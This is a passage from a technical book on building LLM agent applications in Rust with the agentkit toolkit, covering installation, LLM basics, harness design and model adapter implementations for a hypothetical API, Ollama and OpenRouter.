Introduction

This book is a technical guide to building LLM agent applications in Rust. It uses agentkit — a modular toolkit split into small, composable crates — as both the teaching vehicle and a production-ready library you can integrate into your own projects.

It is a progressive walkthrough of the design decisions, trade-offs, and implementation patterns behind a working agent system. By the end, you should be able to:

Integrate agentkit into your own applications
Understand why each abstraction exists and what alternatives were considered
Build your own agent toolkit from scratch if you prefer

What agentkit is

agentkit is a Rust toolkit for building LLM agent applications: coding agents, assistant CLIs, multi-agent orchestration tools, and anything else that runs a model in a loop with tools.

The project is split into small crates behind feature flags. You pull in only what you need. The core loop is runtime-agnostic. Tool crates, MCP integration, and provider adapters add functionality at the edges.

How this book is structured

The book follows the dependency graph of a real agent system, bottom-up:

Part I: The agent loop starts with the fundamental question — what is an agent loop? — and builds up from transcript types through streaming, model adapters, the driver, and interrupt-based control flow. This is the foundation everything else rests on.

Part II: Tools and safety introduces the capability and tool abstraction layers, the permission system, built-in filesystem and shell tools, and how to write your own. Safety is a first-class concern, not an afterthought.

Part III: Context, compaction, and memory covers how agents load project context and how to manage transcript growth through compaction strategies.

Part IV: Integration and extensibility covers MCP server integration, async task management for parallel tool execution, reporting and observability, and provider adapter implementation.

Part V: Building a coding agent ties everything together by walking through the architecture of a complete coding agent — the kind of tool you use every day when you use Claude Code or Codex CLI.

Who this is for

This book assumes you are comfortable with Rust and have a working understanding of async programming. You do not need prior experience with LLM APIs, but familiarity with the basic concept of chat completions (system/user/assistant messages, tool calling) will help.

If you are evaluating agent frameworks, this book will give you enough depth to make an informed decision. If you are building your own agent system, it covers the design constraints you are likely to encounter.

Installation

Requirements

Rust 1.92 or later (workspace edition 2024)

Adding agentkit to your project

cargo add agentkit

Or add it to your Cargo.toml:

[dependencies]
agentkit = "0.9.0"

Minimal dependency set

By default, agentkit enables: core, capabilities, tools, loop, and reporting. The loop feature transitively pulls in task-manager.

To keep your build lean, disable defaults and pick only what you need:

[dependencies]
agentkit = { version = "0.9.0", default-features = false, features = ["core", "loop"] }

Provider adapters and MCP integration are opt-in features:

[dependencies]
agentkit = { version = "0.9.0", features = ["provider-anthropic", "mcp", "tool-fs", "tool-shell"] }

See the Feature flags reference for the full list.

Building from source

git clone https://github.com/danielkov/agentkit.git
cd agentkit
cargo build

Running the examples

Most examples use OpenRouter as the model provider. Create a .env file in the repo root:

OPENROUTER_API_KEY=your_key_here
OPENROUTER_MODEL=anthropic/claude-sonnet-4.5

Then run any example:

cargo run -p openrouter-chat -- "hello"

For the Anthropic provider, the anthropic-chat example demonstrates streaming, server tools, and extended thinking:

ANTHROPIC_API_KEY=your_key_here
ANTHROPIC_MODEL=claude-opus-4-7
ANTHROPIC_MAX_TOKENS=4096

cargo run -p anthropic-chat -- --web-search 3 --thinking 2048

For the Cerebras provider, the cerebras-chat REPL covers the chat path and the cerebras-batch CLI covers the Files + Batch API:

CEREBRAS_API_KEY=your_key_here
CEREBRAS_MODEL=gpt-oss-120b

cargo run -p cerebras-chat -- --reasoning-effort medium --compression msgpack+gzip
cargo run -p cerebras-batch -- run ./prompts.json

The full set of bundled examples:

openrouter-chat — minimal REPL against OpenRouter
openrouter-agent-cli — agent loop with tools
openrouter-coding-agent — coding agent with filesystem + shell
openrouter-compaction-agent — compaction strategies
openrouter-context-agent — AGENTS.md and skills loading
openrouter-context-window-compaction — semantic compaction triggers
openrouter-macro-tool — #[tool] macro
openrouter-mcp-tool — federated MCP tools
openrouter-parallel-agent — parallel/background tool execution
openrouter-session-persistence — resumable sessions
openrouter-subagent-tool — subagent-as-tool composition
anthropic-chat — streaming, server tools, extended thinking
cerebras-chat, cerebras-batch — Cerebras chat + batch
mcp-dynamic-auth, mcp-reference-interop — MCP transport + auth

The examples are referenced throughout this book. Each chapter points to the relevant example that exercises the concepts being discussed.

How do LLMs even work?

Large Language Models (LLMs) are probabilistic models, typically based on the transformer architecture, trained via gradient-based machine learning to predict the next token in a sequence.

They don’t “think” or maintain persistent memory. During inference, a pre-trained model processes an input sequence and generates output token-by-token. LLMs are stateless across requests, but fully condition on all tokens within the current context window.

Key parameters and concepts:

context window size: the maximum number of tokens (input + output) the model can process in a single request. Frontier models can reach ~1M tokens; ~100k–250k is typical for strong models.
temperature: controls randomness in token sampling. Lower values bias toward high-probability tokens (more deterministic); higher values increase diversity by allowing lower-probability tokens to be selected.
weights and fine-tuning: the model consists of learned parameters (“weights”) arranged in matrices across layers. These encode statistical relationships between tokens. Fine-tuning adjusts these weights to specialise behaviour on specific data or tasks.

Tokenisation

LLMs operate on tokens, not raw text. Tokens are subword units (e.g. “un”, “likely”, “##hood”).

raw text:      "unlikely"
                   │
            ┌──────┴─────┐
tokens:    [un]  [like] [ly]
            │      │      │
token ids: [348] [2193] [306]

Implications:

cost scales with token count, not characters
prompt design must consider token efficiency
edge cases (code, JSON, whitespace) matter

Next-token prediction

At its core, an LLM repeatedly does:

Encode input tokens into vectors (embeddings)
Pass them through transformer layers (attention + MLPs)
Produce logits (unnormalised probabilities over vocabulary)
Sample/select the next token
Append token and repeat

input: [The] [cat] [sat]
         │     │     │
         ▼     ▼     ▼
┌────────────────────────┐
│      Embedding         │  map token ids → dense vectors
└───────────┬────────────┘
            ▼
┌────────────────────────┐
│  Transformer Layer ×N  │  self-attention + feed-forward
└───────────┬────────────┘
            ▼
┌────────────────────────┐
│   Logits (vocab size)  │  unnormalised scores over all tokens
└───────────┬────────────┘
            ▼
┌────────────────────────┐
│  Sampling / Argmax     │  pick next token
└───────────┬────────────┘
            ▼
           [on]  ← append to sequence, repeat

This loop continues until a stop condition is reached.

Attention (the core primitive)

Transformers rely on self-attention:

Every token attends to every other token in the sequence
Attention weights determine relevance between tokens

Sequence: [The] [cat] [sat] [on] [the] [___]

Attention from [___] to all previous tokens:

[The]  ░░░░░░░░░░░░░░░░░░             low
[cat]  ████████████████████████████   high  ← subject
[sat]  ██████████████████████         med   ← verb
[on]   ████████████████████████████   high  ← preposition
[the]  ███████████████                med   ← article
                                      ────────────►
                                       attention weight

Intuition: Instead of fixed rules, the model dynamically decides:

“Which previous tokens matter for predicting the next one?”

This is why LLMs can:

track long dependencies
follow instructions
mimic structure (e.g. code, JSON)

Sampling controls (beyond temperature)

Temperature is only one lever. Others include:

top-k: restrict sampling to the k most likely tokens
top-p (nucleus sampling): restrict to smallest set of tokens whose cumulative probability ≥ p
frequency / presence penalties: discourage repetition

These directly affect:

determinism
verbosity
hallucination rate

Logits after softmax (probability distribution over vocab):

token   prob     temperature=0.2         temperature=1.0
─────   ─────    ──────────────────      ──────────────────
"mat"   0.45     █████████████████       █████████
"rug"   0.25     ████████░░░░░░░░░       █████
"bed"   0.15     ████░░░░░░░░░░░░░       ███
"hat"   0.10     ██░░░░░░░░░░░░░░░       ██
"sky"   0.05     ░░░░░░░░░░░░░░░░░       █
                 ▲ concentrated          ▲ spread out
                 (nearly deterministic) (more creative)

With top-k=3:    only [mat, rug, bed] are candidates
With top-p=0.85: only [mat, rug, bed] (cumulative 0.85)

Why hallucinations happen

LLMs optimise for:

“What token is statistically likely next?”

—not:

“What is true?”

So they will:

confidently generate plausible but incorrect information
fill gaps when context is missing
prefer fluency over factuality

Mitigations:

better prompting
retrieval (RAG)
constrained decoding
fine-tuning

Fine-tuning vs prompting vs RAG

Three different levers:

prompting: steer behaviour at runtime (cheap, flexible)
fine-tuning: modify weights (expensive, persistent)
RAG (retrieval-augmented generation): inject external knowledge at inference

Rule of thumb:

behaviour → prompt
knowledge → RAG
style/consistency → fine-tune

Harnesses

To practically interface with LLMs, we build applications around them, called harnesses. A harness contains the LLM’s probabilistic behaviour, enhances it and steers it towards deterministic outcomes.

A good harness has:

a loop to feed a continuous conversation into the model
configuration options or an interface, for customizing model behaviour
observability, to allow users to adjust their inputs based on how the model responds
a toolset, to allow the model to perform tasks

┌─────────────────────────────────────────────────┐
│                   Harness                       │
│                                                 │
│   ┌───────────┐    ┌───────────┐    ┌─────────┐ │
│   │  Config   │    │    LLM    │    │  Tools  │ │
│   │ (prompts, │───▶│  (infer)  │───▶│ (act on │ │
│   │  params)  │    │           │    │  world) │ │
│   └───────────┘    └─────┬─────┘    └────┬────┘ │
│                          │               │      │
│                    ┌─────▼───────────────▼───┐  │
│                    │     Conversation loop   │  │
│                    │  (accumulate + re-send) │  │
│                    └────────────┬────────────┘  │
│                                 │               │
│                    ┌────────────▼────────────┐  │
│                    │     Observability       │  │
│                    │  (logs, metrics, traces)│  │
│                    └─────────────────────────┘  │
└─────────────────────────────────────────────────┘

The diagram above describes a chatbot harness — user input in, text out. An agent harness adds a feedback path: when the model’s output contains tool calls, the harness executes them and appends the results to the conversation before the next inference call.

This feedback path makes the harness a loop. The loop introduces several concerns that a single-turn harness does not have:

streaming: tokens arrive incrementally, but tool calls must be fully assembled before execution
interrupts: users need to be able to abort a loop heading in the wrong direction, and external systems may need to preempt it with urgent events — the loop must support pause, yield, and resume
context growth: each tool call and result adds tokens to the transcript, which will eventually exceed the context window
concurrency: independent tool calls benefit from parallel execution, but the model needs all results before it can continue
safety: the model can request arbitrary actions — the harness must decide which ones to permit

Chat harness (open loop):

  User ──▶ Model ──▶ Text ──▶ User


Agent harness (closed loop):

  User ──▶ Model ──┬──▶ Text ──▶ User
                   │
                   ├──▶ Tool call
                   │       │
                   │    Execute
                   │       │
                   │    Result
                   │       │
                   └───────┘  ← feed back, model continues

From harness to toolkit

A minimal agent loop is straightforward to implement. Handling all of the above — and composing cleanly into different host applications (a CLI, a web server, a multi-agent system) — requires deliberate decomposition.

agentkit splits the agent harness into independent crates, each responsible for one concern:

Concern	agentkit crate
Transcript data model	`agentkit-core`
Agent loop and driver	`agentkit-loop`
Tool abstraction	`agentkit-tools-core`
Filesystem and shell tools	`agentkit-tool-fs`, `agentkit-tool-shell`
Permission system	`agentkit-capabilities`
Context loading	`agentkit-context`
Transcript compaction	`agentkit-compaction`
MCP integration	`agentkit-mcp`
Task management	`agentkit-task-manager`
Observability	`agentkit-reporting`
Provider adapters	`agentkit-provider-*`

Each crate can be used independently. The core loop is agnostic to the model provider, tool set, and presentation layer. The rest of this book builds up each piece, starting from the loop itself.

Chapter 2: What is an agent loop? →

Talking to models

Chapter 0 covered how LLMs work internally — tokenisation, attention, sampling. This chapter covers the practical question: how does your code send a transcript to a model and get a response back?

The answer depends on where the model runs and how the provider exposes it. agentkit abstracts over these differences with three traits: ModelAdapter, ModelSession, and ModelTurn. This chapter introduces the traits, builds an adapter from scratch for a hypothetical non-standard API, then shows how agentkit-adapter-completions handles the common case for OpenAI-compatible providers.

Transport: local vs remote

Model providers fall into two categories:

	Local	Remote
Where it runs	On your machine	On provider infra
Transport	HTTP to localhost	HTTP to provider API
Auth	None required	API key / OAuth
Resource mgmt	You manage GPU/CPU	Provider manages scaling
Examples	Ollama, llama.cpp, vLLM, LocalAI	OpenRouter, Anthropic, OpenAI

Both categories use HTTP and the OpenAI-compatible chat completions format (or close variants of it). The differences are in authentication, endpoint URLs, and which features are supported (streaming, tool calling, multimodal inputs).

From an adapter’s perspective, the transport is the same — an HTTP POST with a JSON body. What varies is:

authentication: local servers typically need none; remote providers require API keys or headers
request schema: most providers follow the OpenAI chat completions shape, with provider-specific extensions
response shape: the same choices and message structure, with varying support for tool calls, usage reporting, and reasoning output
streaming: some providers return a single JSON response; others stream server-sent events (SSE)

The chat completions format

Most providers (including Ollama, OpenRouter, OpenAI, and many others) speak the same wire format: the OpenAI chat completions API. Understanding this format is essential for adapter work, because the adapter’s job is to translate between it and agentkit’s transcript model.

Request

A chat completion request is a JSON POST body with three key fields:

{
  "model": "llama3.1:8b",
  "messages": [
    { "role": "system", "content": "You are a helpful assistant." },
    { "role": "user", "content": "What is 2 + 2?" }
  ],
  "stream": false
}

The messages array is the transcript. Each message has a role and content. The roles map to agentkit’s ItemKind:

Chat completions role	agentkit `ItemKind`
`system`	`System`, `Developer`, `Context`
`user`	`User`
`assistant`	`Assistant`
`tool`	`Tool`

When tools are available, the request includes a tools array describing each tool’s name, description, and JSON Schema for its parameters:

{
  "model": "llama3.1:8b",
  "messages": [ ... ],
  "tools": [
    {
      "type": "function",
      "function": {
        "name": "read_file",
        "description": "Read a file from disk",
        "parameters": {
          "type": "object",
          "properties": {
            "path": { "type": "string" }
          },
          "required": ["path"]
        }
      }
    }
  ]
}

Optional fields include temperature, max_completion_tokens, top_p, and provider-specific extensions.

Response (non-streaming)

The response wraps the model’s output in a choices array:

{
  "id": "chatcmpl-abc123",
  "choices": [
    {
      "index": 0,
      "message": {
        "role": "assistant",
        "content": "2 + 2 = 4."
      },
      "finish_reason": "stop"
    }
  ],
  "usage": {
    "prompt_tokens": 25,
    "completion_tokens": 8,
    "total_tokens": 33
  }
}

finish_reason tells you why the model stopped:

`finish_reason`	Meaning	agentkit `FinishReason`
`stop`	Model finished normally	`Completed`
`tool_calls`	Model wants to call tools	`ToolCall`
`length`	Hit token limit	`MaxTokens`
`content_filter`	Blocked by safety filter	`Blocked`

When the model calls tools, the message includes a tool_calls array instead of (or alongside) content:

{
  "choices": [
    {
      "message": {
        "role": "assistant",
        "content": null,
        "tool_calls": [
          {
            "id": "call_abc123",
            "type": "function",
            "function": {
              "name": "read_file",
              "arguments": "{\"path\": \"src/main.rs\"}"
            }
          }
        ]
      },
      "finish_reason": "tool_calls"
    }
  ]
}

Note that arguments is a JSON string, not a JSON object — it needs an extra parse step.

To send tool results back, you append messages with role: "tool":

{
  "role": "tool",
  "tool_call_id": "call_abc123",
  "content": "fn main() { ... }"
}

Streaming (SSE)

When "stream": true, the response is a series of server-sent events. Each event carries a delta (partial content) instead of a complete message:

data: {"choices":[{"delta":{"role":"assistant","content":"2"},"index":0}]}

data: {"choices":[{"delta":{"content":" +"},"index":0}]}

data: {"choices":[{"delta":{"content":" 2"},"index":0}]}

data: {"choices":[{"delta":{"content":" = 4."},"index":0,"finish_reason":"stop"}]}

data: [DONE]

The consumer reassembles the full message by concatenating delta.content chunks. Tool call arguments also stream incrementally. This is where agentkit’s Delta type comes in — it provides a structured representation of these incremental updates. Streaming is covered in detail in a later chapter.

What an adapter does with this

An adapter’s job is two translations:

agentkit → provider (request):
  Vec<Item>                         ──▶ messages[]
  Vec<ToolSpec>                     ──▶ tools[]
  SessionConfig / TurnRequest.cache ──▶ auth headers, model field, cache controls

provider → agentkit (response):
  choices[0].message            ──▶ Item { kind: Assistant, parts: [...] }
  choices[0].message.tool_calls ──▶ ToolCallPart per call
  usage                         ──▶ Usage { tokens: TokenUsage { ... } }
  finish_reason                 ──▶ FinishReason

The rest of this chapter shows how these translations map to agentkit’s adapter traits.

The adapter traits

agentkit defines three traits that model the lifecycle of talking to a provider:

ModelAdapter          ModelSession      ModelTurn
────────────          ────────────      ─────────
start_session() ──▶   begin_turn() ──▶  next_event() ──▶ ModelTurnEvent
                      begin_turn() ──▶  next_event() ──▶ ModelTurnEvent
                      begin_turn() ──▶  ...
                                        next_event() ──▶ None (exhausted)

ModelAdapter — a factory. It holds configuration (API keys, model name, HTTP client) and produces sessions. It is Send + Sync so it can be shared across threads.
ModelSession — a connection-scoped handle. Created once per agent session, it may hold state that persists across turns (e.g. a conversation ID for stateful APIs). Each call to begin_turn() sends the full transcript to the provider and returns a turn.
ModelTurn — a streaming response handle. The loop calls next_event() repeatedly until it returns None or a Finished event. For non-streaming providers, all events can be buffered upfront and drained from a queue.

The trait signatures:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ModelAdapter: Send + Sync {
    type Session: ModelSession;
    async fn start_session(&self, config: SessionConfig) -> Result<Self::Session, LoopError>;
}

#[async_trait]
pub trait ModelSession: Send {
    type Turn: ModelTurn;
    async fn begin_turn(
        &mut self,
        request: TurnRequest,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Self::Turn, LoopError>;
}

#[async_trait]
pub trait ModelTurn: Send {
    async fn next_event(
        &mut self,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Option<ModelTurnEvent>, LoopError>;
}
}

TurnRequest carries everything the provider needs:

#![allow(unused)]
fn main() {
pub struct TurnRequest {
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub transcript: Vec<Item>,
    pub available_tools: Vec<ToolSpec>,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}
}

ModelTurnEvent is what comes back:

#![allow(unused)]
fn main() {
pub enum ModelTurnEvent {
    Delta(Delta),
    ToolCall(ToolCallPart),
    Usage(Usage),
    Finished(ModelTurnResult),
}
}

Building an adapter from scratch

To see what the traits require, consider a hypothetical model provider that does not use the OpenAI format. Suppose “AcmeAI” has a proprietary REST API:

POST https://api.acme.ai/v1/generate
Authorization: Bearer <token>

{
  "prompt": "What is 2 + 2?",
  "system_instruction": "You are a helpful assistant.",
  "config": { "temperature": 0.5, "max_tokens": 256 }
}

Response:
{
  "text": "2 + 2 = 4.",
  "tokens_used": { "input": 25, "output": 8 },
  "stop_reason": "complete"
}

No messages array. No choices wrapper. No tool_calls. A completely different shape. The adapter must translate to and from it.

Adapter and session

#![allow(unused)]
fn main() {
pub struct AcmeAdapter {
    client: Client,
    api_key: String,
}

pub struct AcmeSession {
    client: Client,
    api_key: String,
}

#[async_trait]
impl ModelAdapter for AcmeAdapter {
    type Session = AcmeSession;

    async fn start_session(&self, _config: SessionConfig) -> Result<AcmeSession, LoopError> {
        Ok(AcmeSession {
            client: self.client.clone(),
            api_key: self.api_key.clone(),
        })
    }
}
}

Turn: the translation layer

begin_turn does the work. It must convert agentkit’s transcript into Acme’s request format and convert the response back into ModelTurnEvents:

#![allow(unused)]
fn main() {
#[async_trait]
impl ModelSession for AcmeSession {
    type Turn = AcmeTurn;

    async fn begin_turn(
        &mut self,
        request: TurnRequest,
        _cancellation: Option<TurnCancellation>,
    ) -> Result<AcmeTurn, LoopError> {
        // Extract the last user message as the prompt.
        // Acme doesn't support multi-turn — flatten the transcript.
        let prompt = request.transcript.iter()
            .rev()
            .find(|item| item.kind == ItemKind::User)
            .and_then(|item| item.parts.first())
            .and_then(|part| match part {
                Part::Text(t) => Some(t.text.clone()),
                _ => None,
            })
            .unwrap_or_default();

        let system = request.transcript.iter()
            .find(|item| item.kind == ItemKind::System)
            .and_then(|item| item.parts.first())
            .and_then(|part| match part {
                Part::Text(t) => Some(t.text.clone()),
                _ => None,
            });

        let body = json!({
            "prompt": prompt,
            "system_instruction": system,
            "config": { "temperature": 0.5, "max_tokens": 256 },
        });

        let resp: AcmeResponse = self.client
            .post("https://api.acme.ai/v1/generate")
            .bearer_auth(&self.api_key)
            .json(&body)
            .send().await
            .map_err(|e| LoopError::Provider(e.to_string()))?
            .json().await
            .map_err(|e| LoopError::Provider(e.to_string()))?;

        // Convert Acme's response into ModelTurnEvents
        let mut events = VecDeque::new();

        events.push_back(ModelTurnEvent::Usage(Usage {
            tokens: Some(TokenUsage {
                input_tokens: resp.tokens_used.input,
                output_tokens: resp.tokens_used.output,
                reasoning_tokens: None,
                cached_input_tokens: None,
            }),
            cost: None,
            metadata: MetadataMap::new(),
        }));

        let output_item = Item {
            id: None,
            kind: ItemKind::Assistant,
            parts: vec![Part::Text(TextPart {
                text: resp.text,
                metadata: MetadataMap::new(),
            })],
            metadata: MetadataMap::new(),
        };

        let finish_reason = match resp.stop_reason.as_str() {
            "complete" => FinishReason::Completed,
            "max_tokens" => FinishReason::MaxTokens,
            other => FinishReason::Other(other.into()),
        };

        events.push_back(ModelTurnEvent::Finished(ModelTurnResult {
            finish_reason,
            output_items: vec![output_item],
            usage: None,
            metadata: MetadataMap::new(),
            // Optional response identity for the loop's `chat` telemetry
            // span (`gen_ai.response.model` / `gen_ai.response.id`).
            model: None,
            response_id: None,
        }));

        Ok(AcmeTurn { events })
    }
}
}

The turn drain

The turn itself is the same VecDeque pattern used by every non-streaming adapter:

#![allow(unused)]
fn main() {
pub struct AcmeTurn {
    events: VecDeque<ModelTurnEvent>,
}

#[async_trait]
impl ModelTurn for AcmeTurn {
    async fn next_event(
        &mut self,
        _cancellation: Option<TurnCancellation>,
    ) -> Result<Option<ModelTurnEvent>, LoopError> {
        Ok(self.events.pop_front())
    }
}
}

This adapter is complete. It can be passed to Agent::builder().model(adapter) and the loop will call it. The model doesn’t support tool calls, so the loop will always finish after a single turn — but that’s a limitation of Acme’s API, not of the adapter.

The key takeaway: you can integrate any model provider by implementing the three traits. The translation is manual — you map the provider’s request/response format to agentkit’s Item/Part/Usage/FinishReason types. There is no requirement that the provider speaks OpenAI’s format.

The completions adapter

Most providers do speak the OpenAI chat completions format. Implementing the full translation for each one — transcript conversion, multimodal content encoding, tool call parsing, cancellation, error handling — is repetitive. The agentkit-adapter-completions crate handles all of it once.

Instead of implementing ModelAdapter / ModelSession / ModelTurn directly, a provider implements CompletionsProvider:

#![allow(unused)]
fn main() {
pub trait CompletionsProvider: Send + Sync + Clone {
    /// Strongly-typed request config (model, temperature, etc.).
    /// Serialised and merged into the request body.
    type Config: Serialize + Clone + Send + Sync;

    fn provider_name(&self) -> &str;
    fn endpoint_url(&self) -> &str;
    fn config(&self) -> &Self::Config;

    // Hooks — defaults pass through unchanged:
    fn preprocess_request(&self, builder: agentkit_http::HttpRequestBuilder) -> agentkit_http::HttpRequestBuilder { builder }
    fn preprocess_response(&self, _status: StatusCode, _body: &str) -> Result<(), LoopError> { Ok(()) }
    fn postprocess_response(&self, _usage: &mut Option<Usage>, _metadata: &mut MetadataMap, _raw: &Value) {}
}
}

The request builder is agentkit_http::HttpRequestBuilder — a thin transport abstraction over reqwest. The default HttpClient is reqwest-backed; the reqwest-middleware client is available behind an optional feature, and custom impls can be supplied for tests.

The generic CompletionsAdapter<P> implements ModelAdapter and handles:

Converting Vec<Item> to the messages array (all ItemKind and Part variants)
Serialising P::Config and merging it into the request body
Converting Vec<ToolSpec> to the tools array
Parsing the response into ModelTurnEvents (text, tool calls, reasoning, usage, finish reason)
Encoding multimodal content (images as image_url, audio as input_audio)
Racing the HTTP future against the cancellation handle

┌────────────────────────────────────────────────────────────┐
│  CompletionsAdapter<P>                                     │
│                                                            │
│  ┌────────────────────────┐  ┌──────────────────────────┐  │
│  │ P: CompletionsProvider │  │ request.rs / response.rs │  │
│  │ (endpoint, config,     │  │ (transcript conversion,  │  │
│  │  pre/post hooks)       │  │  response parsing)       │  │
│  └────────────────────────┘  └──────────────────────────┘  │
│                                                            │
│  Implements ModelAdapter ──▶ ModelSession ──▶ ModelTurn    │
└────────────────────────────────────────────────────────────┘

The Config associated type is generic because request parameters differ across providers — and sometimes across models within the same provider. Ollama uses num_predict where OpenAI uses max_completion_tokens. Mistral uses max_tokens. Some providers support top_k, others don’t. Making this a provider-defined Serialize struct means each provider declares exactly the parameters it supports, with their correct field names, and gets compile-time validation and IDE completion. The adapter serialises the struct and merges it into the request body:

#![allow(unused)]
fn main() {
// In the adapter's request builder:
let config_value = serde_json::to_value(provider.config())?;
if let Value::Object(fields) = config_value {
    for (key, value) in fields {
        body.insert(key, value);
    }
}
}

This means Ollama can use num_predict where OpenAI uses max_completion_tokens, Mistral can use max_tokens, and each provider gets IDE completion and compile-time validation for its supported parameters.

Building an Ollama provider

Ollama exposes an OpenAI-compatible endpoint at http://localhost:11434/v1/chat/completions. Using agentkit-adapter-completions, the entire provider is a config struct, a request config struct, and a CompletionsProvider impl.

Configuration

The user-facing config holds connection and inference parameters:

#![allow(unused)]
fn main() {
pub struct OllamaConfig {
    pub model: String,
    pub base_url: String,
    pub temperature: Option<f32>,
    pub num_predict: Option<u32>,
    pub top_k: Option<u32>,
    pub top_p: Option<f32>,
}

impl OllamaConfig {
    pub fn new(model: impl Into<String>) -> Self {
        Self {
            model: model.into(),
            base_url: "http://localhost:11434/v1/chat/completions".into(),
            temperature: None,
            num_predict: None,
            top_k: None,
            top_p: None,
        }
    }

    pub fn with_temperature(mut self, v: f32) -> Self {
        self.temperature = Some(v);
        self
    }

    pub fn with_num_predict(mut self, v: u32) -> Self {
        self.num_predict = Some(v);
        self
    }
    // ...
}
}

Request config

The request config is what gets serialised into the JSON body. It uses #[serde(skip_serializing_if)] so unset parameters are omitted, not sent as null:

#![allow(unused)]
fn main() {
#[derive(Clone, Serialize)]
pub struct OllamaRequestConfig {
    pub model: String,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub temperature: Option<f32>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub num_predict: Option<u32>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub top_k: Option<u32>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub top_p: Option<f32>,
}
}

Provider implementation

The provider struct holds connection details and the request config. The CompletionsProvider impl is minimal — Ollama has no auth and no protocol quirks:

#![allow(unused)]
fn main() {
#[derive(Clone)]
pub struct OllamaProvider {
    base_url: String,
    request_config: OllamaRequestConfig,
}

impl CompletionsProvider for OllamaProvider {
    type Config = OllamaRequestConfig;

    fn provider_name(&self) -> &str { "Ollama" }
    fn endpoint_url(&self) -> &str { &self.base_url }
    fn config(&self) -> &OllamaRequestConfig { &self.request_config }
}
}

No hooks overridden. Ollama needs no auth, has no response quirks, and reports no provider-specific fields. The defaults pass everything through unchanged.

The adapter newtype

The adapter is a newtype over CompletionsAdapter<OllamaProvider>, delegating to it for the ModelAdapter impl:

#![allow(unused)]
fn main() {
#[derive(Clone)]
pub struct OllamaAdapter(CompletionsAdapter<OllamaProvider>);

impl OllamaAdapter {
    pub fn new(config: OllamaConfig) -> Result<Self, OllamaError> {
        let provider = OllamaProvider::from(config);
        Ok(Self(CompletionsAdapter::new(provider)?))
    }
}

#[async_trait]
impl ModelAdapter for OllamaAdapter {
    type Session = CompletionsSession<OllamaProvider>;

    async fn start_session(&self, config: SessionConfig) -> Result<Self::Session, LoopError> {
        self.0.start_session(config).await
    }
}
}

This is the complete provider. All of the transcript conversion, tool call serialisation, response parsing, multimodal encoding, and cancellation handling comes from agentkit-adapter-completions.

Contrast: what the adapter handles vs what the provider handles

`agentkit-adapter-completions`	`agentkit-provider-ollama`
`Vec<Item>` → `messages[]`	endpoint URL
`Vec<ToolSpec>` → `tools[]`	request config (model, temperature, …)
`Config` → request body fields	`preprocess_request` (none needed)
response → `ModelTurnEvent`	`preprocess_response` (none needed)
multimodal content encoding	`postprocess_response` (none needed)
cancellation
error status codes
tool call parsing
usage mapping
finish reason mapping

Providers with quirks

Not all OpenAI-compatible providers are identical. The three hooks exist for providers that need to customise the standard request/response flow.

OpenRouter uses all three:

preprocess_request — adds bearer auth, X-Title, and HTTP-Referer headers
preprocess_response — the API sometimes returns HTTP 200 with an error payload instead of a proper error status; the hook parses these and converts them to errors before the adapter attempts normal deserialization
postprocess_response — extracts the cost field from the usage object (OpenRouter-specific, not part of the standard format) and adds openrouter.model and openrouter.refusal to the item metadata

#![allow(unused)]
fn main() {
impl CompletionsProvider for OpenRouterProvider {
    type Config = OpenRouterRequestConfig;

    fn provider_name(&self) -> &str { "OpenRouter" }
    fn endpoint_url(&self) -> &str { &self.base_url }
    fn config(&self) -> &OpenRouterRequestConfig { &self.request_config }

    fn preprocess_request(
        &self,
        builder: agentkit_http::HttpRequestBuilder,
    ) -> agentkit_http::HttpRequestBuilder {
        let mut builder = builder.bearer_auth(&self.api_key);
        if let Some(app_name) = &self.app_name {
            builder = builder.header("X-Title", app_name);
        }
        if let Some(site_url) = &self.site_url {
            builder = builder.header("HTTP-Referer", site_url);
        }
        builder
    }

    fn preprocess_response(
        &self,
        _status: StatusCode,
        body: &str,
    ) -> Result<(), LoopError> {
        if let Ok(e) = serde_json::from_str::<ErrorResponse>(body) {
            return Err(LoopError::Provider(format!(
                "OpenRouter returned error (code {}): {}",
                e.error.code, e.error.message
            )));
        }
        Ok(())
    }

    fn postprocess_response(
        &self,
        usage: &mut Option<Usage>,
        metadata: &mut MetadataMap,
        raw_response: &Value,
    ) {
        if let Some(cost) = raw_response.pointer("/usage/cost").and_then(Value::as_f64) {
            if let Some(usage) = usage {
                usage.cost = Some(CostUsage {
                    amount: cost,
                    currency: "USD".into(),
                    provider_amount: None,
                });
            }
        }
        if let Some(model) = raw_response.get("model").and_then(Value::as_str) {
            metadata.insert("openrouter.model".into(), Value::String(model.into()));
        }
        if let Some(refusal) = raw_response
            .pointer("/choices/0/message/refusal")
            .and_then(Value::as_str)
        {
            metadata.insert("openrouter.refusal".into(), Value::String(refusal.into()));
        }
    }
}
}

Using it:

#![allow(unused)]
fn main() {
let adapter = OpenRouterAdapter::new(
    OpenRouterConfig::new("sk-or-v1-...", "anthropic/claude-sonnet-4")
        .with_temperature(0.0)
        .with_max_completion_tokens(4096)
        .with_app_name("my-agent"),
)?;

let agent = Agent::builder()
    .model(adapter)
    .input(vec![Item::text(
        ItemKind::User,
        "Explain quicksort in one sentence.",
    )])
    .build()?;
}

Without tools or a loop, an agent can be used for a single one-shot inference call — send a message, get a response. Preload the user message via AgentBuilder::input so the first next() dispatches the model directly:

#![allow(unused)]
fn main() {
let mut driver = agent
    .start(SessionConfig::new("one-shot").with_cache(
        PromptCacheRequest::automatic().with_retention(PromptCacheRetention::Short),
    ))
    .await?;

if let LoopStep::Finished(result) = driver.next().await? {
    for item in result.items {
        for part in &item.parts {
            if let Part::Text(text) = part {
                println!("{}", text.text);
            }
        }
    }
}
}

The cache field is the session-level prompt caching policy — request-level configuration, not transcript data. See Chapter 15: Prompt caching for the full cache request shape, provider mapping, and per-turn overrides.

No tools are registered, so the model returns text and the driver finishes after a single turn. This is the simplest way to use agentkit — a typed HTTP client for chat completions with provider abstraction. The agent loop, covered in the next chapter, adds tool execution and iteration on top.

Available providers

agentkit ships the following provider crates, all built on agentkit-adapter-completions:

Crate	Provider	Auth	Default endpoint
`agentkit-provider-openrouter`	OpenRouter	Bearer + custom headers	`openrouter.ai/api/v1/chat/completions`
